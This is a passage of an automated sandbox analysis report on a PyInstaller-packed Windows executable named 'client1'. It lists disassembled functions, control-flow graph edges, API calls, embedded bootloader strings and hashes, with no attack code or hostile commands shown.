7ff79f63409c 88->93 94 7ff79f621590-7ff79f6215b2 call 7ff79f62f5fc 92->94 93->99 102 7ff79f6215b4-7ff79f6215cc call 7ff79f62fd3c 94->102 103 7ff79f6215e5-7ff79f6215ec 94->103 95->85 96->69 99->82 108 7ff79f6215ce-7ff79f6215d1 102->108 109 7ff79f6215d5-7ff79f6215e3 102->109 105 7ff79f6215f3-7ff79f6215fb call 7ff79f6224d0 103->105 112 7ff79f621600 105->112 108->94 111 7ff79f6215d3 108->111 109->105 111->112 112->93
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                    • API String ID: 0-666925554
                                                    • Opcode ID: 2fea18010eede0dcf90c79ed6fa7ce80656e63f02532b84c6099f7311018752c
                                                    • Instruction ID: 0190cd064c25e385b7292367919a27a15d736b7076455ffd5e4312f0d7858d72
                                                    • Opcode Fuzzy Hash: 2fea18010eede0dcf90c79ed6fa7ce80656e63f02532b84c6099f7311018752c
                                                    • Instruction Fuzzy Hash: EC518C61B0C7C251FE30BB31A8506F9A39ABF45BA4F844531DE2D87796EE3CE5458321
                                                    Function 00007FF79F6278A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                    • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                    • API String ID: 4998090-2855260032
                                                    • Opcode ID: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                    • Instruction ID: 5091bb93fd22be243f411a30a0651f203524a3d1e1ac6d27fc3a0dfc45faf5d1
                                                    • Opcode Fuzzy Hash: 2e28230f75d657313d5b30c4cdf08458408b558478e57b477a7299d9920cfa6e
                                                    • Instruction Fuzzy Hash: 6941333161C7C282E660BF75E8446E9B366FB847A4F840231EA6E876D5DF7CD444CB11
                                                    Function 00007FF79F626FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction ID: d380c7af5ec119b0fcd4c139edf9bb9be3613d7e6ca27189c727d82b26037fa6
                                                    • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction Fuzzy Hash: 2141F032A087C281DA20BB70E8552EAE3A9FB95364F900735E6BD47AD5DF7CD0548B50
                                                    Function 00007FF79F621000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 383 7ff79f621000-7ff79f623686 call 7ff79f62f080 call 7ff79f62f078 call 7ff79f627600 call 7ff79f62f078 call 7ff79f62adb0 call 7ff79f634270 call 7ff79f634f14 call 7ff79f621af0 401 7ff79f62379a 383->401 402 7ff79f62368c-7ff79f62369b call 7ff79f623ba0 383->402 403 7ff79f62379f-7ff79f6237bf call 7ff79f62ad80 401->403 402->401 408 7ff79f6236a1-7ff79f6236b4 call 7ff79f623a70 402->408 408->401 411 7ff79f6236ba-7ff79f6236cd call 7ff79f623b20 408->411 411->401 414 7ff79f6236d3-7ff79f6236fa call 7ff79f626990 411->414 417 7ff79f62373c-7ff79f623764 call 7ff79f626f90 call 7ff79f6219d0 414->417 418 7ff79f6236fc-7ff79f62370b call 7ff79f626990 414->418 428 7ff79f62376a-7ff79f623780 call 7ff79f6219d0 417->428 429 7ff79f62384d-7ff79f62385e 417->429 418->417 424 7ff79f62370d-7ff79f623713 418->424 426 7ff79f62371f-7ff79f623739 call 7ff79f63409c call 7ff79f626f90 424->426 427 7ff79f623715-7ff79f62371d 424->427 426->417 427->426 440 7ff79f6237c0-7ff79f6237c3 428->440 441 7ff79f623782-7ff79f623795 call 7ff79f622770 428->441 433 7ff79f623860-7ff79f62386a call 7ff79f623280 429->433 434 7ff79f623873-7ff79f62388b call 7ff79f627a30 429->434 448 7ff79f62386c 433->448 449 7ff79f6238ab-7ff79f6238b8 call 7ff79f625e40 433->449 444 7ff79f62389e-7ff79f6238a5 SetDllDirectoryW 434->444 445 7ff79f62388d-7ff79f623899 call 7ff79f622770 434->445 440->429 447 7ff79f6237c9-7ff79f6237e0 call 7ff79f623cb0 440->447 441->401 444->449 445->401 456 7ff79f6237e7-7ff79f623813 call 7ff79f627200 447->456 457 7ff79f6237e2-7ff79f6237e5 447->457 448->434 458 7ff79f6238ba-7ff79f6238ca call 7ff79f625ae0 449->458 459 7ff79f623906-7ff79f62390b call 7ff79f625dc0 449->459 468 7ff79f62383d-7ff79f62384b 456->468 469 7ff79f623815-7ff79f62381d call 7ff79f62f2ac 456->469 460 7ff79f623822-7ff79f623838 call 7ff79f622770 457->460 458->459 473 7ff79f6238cc-7ff79f6238db call 7ff79f625640 458->473 466 7ff79f623910-7ff79f623913 459->466 460->401 471 7ff79f623919-7ff79f623926 466->471 472 7ff79f6239c6-7ff79f6239d5 call 7ff79f623110 466->472 468->433 469->460 476 7ff79f623930-7ff79f62393a 471->476 472->401 485 7ff79f6239db-7ff79f623a12 call 7ff79f626f20 call 7ff79f626990 call 7ff79f6253e0 472->485 483 7ff79f6238fc-7ff79f623901 call 7ff79f625890 473->483 484 7ff79f6238dd-7ff79f6238e9 call 7ff79f6255d0 473->484 480 7ff79f62393c-7ff79f623941 476->480 481 7ff79f623943-7ff79f623945 476->481 480->476 480->481 486 7ff79f623947-7ff79f62396a call 7ff79f621b30 481->486 487 7ff79f623991-7ff79f6239c1 call 7ff79f623270 call 7ff79f6230b0 call 7ff79f623260 call 7ff79f625890 call 7ff79f625dc0 481->487 483->459 484->483 498 7ff79f6238eb-7ff79f6238fa call 7ff79f625c90 484->498 485->401 510 7ff79f623a18-7ff79f623a2b call 7ff79f623270 call 7ff79f626fd0 485->510 486->401 497 7ff79f623970-7ff79f62397b 486->497 487->403 501 7ff79f623980-7ff79f62398f 497->501 498->466 501->487 501->501 518 7ff79f623a30-7ff79f623a4d call 7ff79f625890 call 7ff79f625dc0 510->518 523 7ff79f623a57-7ff79f623a61 call 7ff79f621ab0 518->523 524 7ff79f623a4f-7ff79f623a52 call 7ff79f626c90 518->524 523->403 524->523
                                                    APIs
                                                      • Part of subcall function 00007FF79F623BA0: GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF79F6238A5
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2344891160-3602715111
                                                    • Opcode ID: 77e9097737c6dbac510413c8d6195b52a6989022757785ea82a29cea3795633a
                                                    • Instruction ID: 9378a5468035c64dedb7c7cf3ca2fb4a3c8269c726e826f7cfe078daac12dbd0
                                                    • Opcode Fuzzy Hash: 77e9097737c6dbac510413c8d6195b52a6989022757785ea82a29cea3795633a
                                                    • Instruction Fuzzy Hash: 57B1B121A1D7C351FE30BB319D522FDA25ABF44794FC04139EA6D87696EF2CE5048722
                                                    Function 00007FF79F621050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 528 7ff79f621050-7ff79f6210ab call 7ff79f62a610 531 7ff79f6210ad-7ff79f6210d2 call 7ff79f622770 528->531 532 7ff79f6210d3-7ff79f6210eb call 7ff79f6340b0 528->532 537 7ff79f621109-7ff79f621119 call 7ff79f6340b0 532->537 538 7ff79f6210ed-7ff79f621104 call 7ff79f6224d0 532->538 544 7ff79f621137-7ff79f621147 537->544 545 7ff79f62111b-7ff79f621132 call 7ff79f6224d0 537->545 543 7ff79f62126c-7ff79f621281 call 7ff79f62a2f0 call 7ff79f63409c * 2 538->543 561 7ff79f621286-7ff79f6212a0 543->561 546 7ff79f621150-7ff79f621175 call 7ff79f62f5fc 544->546 545->543 554 7ff79f62117b-7ff79f621185 call 7ff79f62f370 546->554 555 7ff79f62125e 546->555 554->555 562 7ff79f62118b-7ff79f621197 554->562 557 7ff79f621264 555->557 557->543 563 7ff79f6211a0-7ff79f6211c8 call 7ff79f628a60 562->563 566 7ff79f6211ca-7ff79f6211cd 563->566 567 7ff79f621241-7ff79f62125c call 7ff79f622770 563->567 568 7ff79f62123c 566->568 569 7ff79f6211cf-7ff79f6211d9 566->569 567->557 568->567 571 7ff79f6211db-7ff79f6211e8 call 7ff79f62fd3c 569->571 572 7ff79f621203-7ff79f621206 569->572 579 7ff79f6211ed-7ff79f6211f0 571->579 574 7ff79f621208-7ff79f621216 call 7ff79f62bb60 572->574 575 7ff79f621219-7ff79f62121e 572->575 574->575 575->563 578 7ff79f621220-7ff79f621223 575->578 581 7ff79f621237-7ff79f62123a 578->581 582 7ff79f621225-7ff79f621228 578->582 583 7ff79f6211fe-7ff79f621201 579->583 584 7ff79f6211f2-7ff79f6211fc call 7ff79f62f370 579->584 581->557 582->567 586 7ff79f62122a-7ff79f621232 582->586 583->567 584->575 584->583 586->546
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-1655038675
                                                    • Opcode ID: de1008961ff69e091347802e1359ecf358b4a9365226622b4b91588027350825
                                                    • Instruction ID: 2b31e093f5533dd89edb20ea74b162bd156f727efe36cfc882a4b9eebf5bb82e
                                                    • Opcode Fuzzy Hash: de1008961ff69e091347802e1359ecf358b4a9365226622b4b91588027350825
                                                    • Instruction Fuzzy Hash: DA51A022A0D7C285EA30BB61A8403FAA29AFB85794F844135EE6D87785EF3CE545C711
                                                    Function 00007FF79F63AF2C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 660 7ff79f63af2c-7ff79f63af52 661 7ff79f63af6d-7ff79f63af71 660->661 662 7ff79f63af54-7ff79f63af68 call 7ff79f634424 call 7ff79f634444 660->662 664 7ff79f63b347-7ff79f63b353 call 7ff79f634424 call 7ff79f634444 661->664 665 7ff79f63af77-7ff79f63af7e 661->665 678 7ff79f63b35e 662->678 684 7ff79f63b359 call 7ff79f639db0 664->684 665->664 667 7ff79f63af84-7ff79f63afb2 665->667 667->664 670 7ff79f63afb8-7ff79f63afbf 667->670 673 7ff79f63afd8-7ff79f63afdb 670->673 674 7ff79f63afc1-7ff79f63afd3 call 7ff79f634424 call 7ff79f634444 670->674 676 7ff79f63afe1-7ff79f63afe7 673->676 677 7ff79f63b343-7ff79f63b345 673->677 674->684 676->677 682 7ff79f63afed-7ff79f63aff0 676->682 681 7ff79f63b361-7ff79f63b378 677->681 678->681 682->674 686 7ff79f63aff2-7ff79f63b017 682->686 684->678 689 7ff79f63b04a-7ff79f63b051 686->689 690 7ff79f63b019-7ff79f63b01b 686->690 691 7ff79f63b026-7ff79f63b03d call 7ff79f634424 call 7ff79f634444 call 7ff79f639db0 689->691 692 7ff79f63b053-7ff79f63b07b call 7ff79f63cacc call 7ff79f639e18 * 2 689->692 693 7ff79f63b01d-7ff79f63b024 690->693 694 7ff79f63b042-7ff79f63b048 690->694 726 7ff79f63b1d0 691->726 721 7ff79f63b098-7ff79f63b0c3 call 7ff79f63b754 692->721 722 7ff79f63b07d-7ff79f63b093 call 7ff79f634444 call 7ff79f634424 692->722 693->691 693->694 697 7ff79f63b0c8-7ff79f63b0df 694->697 698 7ff79f63b15a-7ff79f63b164 call 7ff79f642a3c 697->698 699 7ff79f63b0e1-7ff79f63b0e9 697->699 712 7ff79f63b16a-7ff79f63b17f 698->712 713 7ff79f63b1ee 698->713 699->698 702 7ff79f63b0eb-7ff79f63b0ed 699->702 702->698 706 7ff79f63b0ef-7ff79f63b105 702->706 706->698 710 7ff79f63b107-7ff79f63b113 706->710 710->698 715 7ff79f63b115-7ff79f63b117 710->715 712->713 718 7ff79f63b181-7ff79f63b193 GetConsoleMode 712->718 717 7ff79f63b1f3-7ff79f63b213 ReadFile 713->717 715->698 720 7ff79f63b119-7ff79f63b131 715->720 723 7ff79f63b219-7ff79f63b221 717->723 724 7ff79f63b30d-7ff79f63b316 GetLastError 717->724 718->713 725 7ff79f63b195-7ff79f63b19d 718->725 720->698 730 7ff79f63b133-7ff79f63b13f 720->730 721->697 722->726 723->724 732 7ff79f63b227 723->732 727 7ff79f63b318-7ff79f63b32e call 7ff79f634444 call 7ff79f634424 724->727 728 7ff79f63b333-7ff79f63b336 724->728 725->717 734 7ff79f63b19f-7ff79f63b1c1 ReadConsoleW 725->734 729 7ff79f63b1d3-7ff79f63b1dd call 7ff79f639e18 726->729 727->726 740 7ff79f63b1c9-7ff79f63b1cb call 7ff79f6343b8 728->740 741 7ff79f63b33c-7ff79f63b33e 728->741 729->681 730->698 739 7ff79f63b141-7ff79f63b143 730->739 743 7ff79f63b22e-7ff79f63b243 732->743 735 7ff79f63b1e2-7ff79f63b1ec 734->735 736 7ff79f63b1c3 GetLastError 734->736 735->743 736->740 739->698 748 7ff79f63b145-7ff79f63b155 739->748 740->726 741->729 743->729 750 7ff79f63b245-7ff79f63b250 743->750 748->698 753 7ff79f63b277-7ff79f63b27f 750->753 754 7ff79f63b252-7ff79f63b26b call 7ff79f63ab44 750->754 755 7ff79f63b2fb-7ff79f63b308 call 7ff79f63a984 753->755 756 7ff79f63b281-7ff79f63b293 753->756 759 7ff79f63b270-7ff79f63b272 754->759 755->759 760 7ff79f63b2ee-7ff79f63b2f6 756->760 761 7ff79f63b295 756->761 759->729 760->729 764 7ff79f63b29a-7ff79f63b2a1 761->764 765 7ff79f63b2dd-7ff79f63b2e8 764->765 766 7ff79f63b2a3-7ff79f63b2a7 764->766 765->760 767 7ff79f63b2a9-7ff79f63b2b0 766->767 768 7ff79f63b2c3 766->768 767->768 769 7ff79f63b2b2-7ff79f63b2b6 767->769 770 7ff79f63b2c9-7ff79f63b2d9 768->770 769->768 771 7ff79f63b2b8-7ff79f63b2c1 769->771 770->764 772 7ff79f63b2db 770->772 771->770 772->760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                    • Instruction ID: c801ba19517fe8c095bfee1e2afcf681606a9116e899a8ae86aa424cf4ace6f0
                                                    • Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                    • Instruction Fuzzy Hash: 45C1C52290C7C691EA70BB35A4402FDE7AAEFC1B84F950135E96D03796CEBDE8458720
                                                    Function 00007FF79F63C430 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 850 7ff79f63c430-7ff79f63c455 851 7ff79f63c45b-7ff79f63c45e 850->851 852 7ff79f63c723 850->852 853 7ff79f63c497-7ff79f63c4c3 851->853 854 7ff79f63c460-7ff79f63c492 call 7ff79f639ce4 851->854 855 7ff79f63c725-7ff79f63c735 852->855 857 7ff79f63c4ce-7ff79f63c4d4 853->857 858 7ff79f63c4c5-7ff79f63c4cc 853->858 854->855 860 7ff79f63c4d6-7ff79f63c4df call 7ff79f63b7f0 857->860 861 7ff79f63c4e4-7ff79f63c4f9 call 7ff79f642a3c 857->861 858->854 858->857 860->861 865 7ff79f63c4ff-7ff79f63c508 861->865 866 7ff79f63c613-7ff79f63c61c 861->866 865->866 869 7ff79f63c50e-7ff79f63c512 865->869 867 7ff79f63c61e-7ff79f63c624 866->867 868 7ff79f63c670-7ff79f63c695 WriteFile 866->868 872 7ff79f63c65c-7ff79f63c66e call 7ff79f63bee8 867->872 873 7ff79f63c626-7ff79f63c629 867->873 870 7ff79f63c697-7ff79f63c69d GetLastError 868->870 871 7ff79f63c6a0 868->871 874 7ff79f63c514-7ff79f63c51c call 7ff79f633a20 869->874 875 7ff79f63c523-7ff79f63c52e 869->875 870->871 879 7ff79f63c6a3 871->879 894 7ff79f63c600-7ff79f63c607 872->894 880 7ff79f63c648-7ff79f63c65a call 7ff79f63c108 873->880 881 7ff79f63c62b-7ff79f63c62e 873->881 874->875 876 7ff79f63c530-7ff79f63c539 875->876 877 7ff79f63c53f-7ff79f63c554 GetConsoleMode 875->877 876->866 876->877 884 7ff79f63c55a-7ff79f63c560 877->884 885 7ff79f63c60c 877->885 887 7ff79f63c6a8 879->887 880->894 888 7ff79f63c6b4-7ff79f63c6be 881->888 889 7ff79f63c634-7ff79f63c646 call 7ff79f63bfec 881->889 892 7ff79f63c5e9-7ff79f63c5fb call 7ff79f63ba70 884->892 893 7ff79f63c566-7ff79f63c569 884->893 885->866 895 7ff79f63c6ad 887->895 896 7ff79f63c71c-7ff79f63c721 888->896 897 7ff79f63c6c0-7ff79f63c6c5 888->897 889->894 892->894 900 7ff79f63c56b-7ff79f63c56e 893->900 901 7ff79f63c574-7ff79f63c582 893->901 894->887 895->888 896->855 902 7ff79f63c6c7-7ff79f63c6ca 897->902 903 7ff79f63c6f3-7ff79f63c6fd 897->903 900->895 900->901 907 7ff79f63c5e0-7ff79f63c5e4 901->907 908 7ff79f63c584 901->908 909 7ff79f63c6cc-7ff79f63c6db 902->909 910 7ff79f63c6e3-7ff79f63c6ee call 7ff79f634400 902->910 905 7ff79f63c6ff-7ff79f63c702 903->905 906 7ff79f63c704-7ff79f63c713 903->906 905->852 905->906 906->896 907->879 912 7ff79f63c588-7ff79f63c59f call 7ff79f642b08 908->912 909->910 910->903 916 7ff79f63c5d7-7ff79f63c5dd GetLastError 912->916 917 7ff79f63c5a1-7ff79f63c5ad 912->917 916->907 918 7ff79f63c5cc-7ff79f63c5d3 917->918 919 7ff79f63c5af-7ff79f63c5c1 call 7ff79f642b08 917->919 918->907 920 7ff79f63c5d5 918->920 919->916 923 7ff79f63c5c3-7ff79f63c5ca 919->923 920->912 923->918
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C54C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF79F63C41B), ref: 00007FF79F63C5D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction ID: 5604af1f55dfa74d243b04c6b709e5414ebe5a52dd48abac83f59e56c415e26f
                                                    • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                    • Instruction Fuzzy Hash: DD91F422E087A285F771AF3594402FDABFABB45B88F945139EE1E53A85CF78D441C720
                                                    Function 00007FF79F63E8DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_isindst
                                                    • String ID:
                                                    • API String ID: 4170891091-0
                                                    • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction ID: 3e9ed73f2e8261dce19645282c8f43f150ae992c41bc12e35cf438408835576f
                                                    • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                    • Instruction Fuzzy Hash: 84512972F047918AFB34EF7498412FCA7AABB10358F944235ED2E52AD5DB3CA406C720
                                                    Function 00007FF79F6347D4 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                    • String ID:
                                                    • API String ID: 2780335769-0
                                                    • Opcode ID: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
                                                    • Instruction ID: da029fc5d351682b408e8feb9d914ebf8abeb788ae687c28d879cfc1d896197f
                                                    • Opcode Fuzzy Hash: 1c70a69b05d9cb3f6248f84cd75ebf1bef0caf7e7cf88daad42b4853df974b62
